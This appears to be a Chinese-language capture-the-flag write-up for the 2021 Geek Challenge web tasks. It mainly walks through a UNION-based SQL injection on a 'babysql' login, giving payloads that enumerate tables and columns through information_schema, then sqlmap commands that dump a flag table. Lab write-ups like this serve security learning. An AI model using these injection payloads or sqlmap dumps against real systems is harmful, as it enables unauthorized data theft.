2021极客大挑战

极客大挑战2021 Welcome2021

考点：http头请求方法 F12，提示请使用WELCOME请求方法来请求此网页 burp抓包，修改请求方法，发现f1111aaaggg9.php 再次请求得到flag

Dark

Tor浏览器(洋葱浏览器)直接访问访问即可。 但前提自己需要去配好Tor浏览器。

babysql

考点：没有任何过滤的union注入

前面还是先查是整数注入还是字符注入

查列数

uname=1' order by 4#

查库：babysql

uname=-1' union select database(),2,3,4#&pwd=1

查表：jeff,jeffjokes

uname=-1' union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema=database()%23&pwd=1
查列：

jeff

uname,pwd,zzzz,uselesss

uname=-1' union select group_concat(column_name),2,3,4 from information_schema.columns where table_name="jeff"%23&pwd=1

jeffjokes

id,english,chinese,misc,useless

uname=-1' union select group_concat(column_name),2,3,4 from information_schema.columns where table_name="jeffjokes"%23&pwd=1

查数据：没有查出flag

uname=-1' union select group_concat(chinese),2,3,4 from jeffjokes#&pwd=1

这儿我开始特别懵，疯狂检查我语句，试了每一表的每一个列，但是都不对。

有一句话，猜测是提示：

编译器从来不给Jeff编译警告，而是Jeff警告编译器,所有指针都是指向Jeff的,gcc的-O4优化选项是将你的代码邮件给Jeff重写一下,当Jeff触发程序的程序性能采样时，循环会因害怕而自动展开。,Jeff依然孤独地等待着数学家们解开他在PI的数字中隐藏的笑话

这是谷歌大神jeff bean的事迹

最后发现找错库了

用sqlmap爆了一下

ps: 属于sqlmap的post注入

查库：
python3 sqlmap.py -r "D:\Desktop\5.txt" -p uname --dbs

python3 sqlmap.py -r 1.txt -p uname -D flag -T fllag -C  "fllllllag" --dump

babyphp

robots.txt，得到noobcurl.php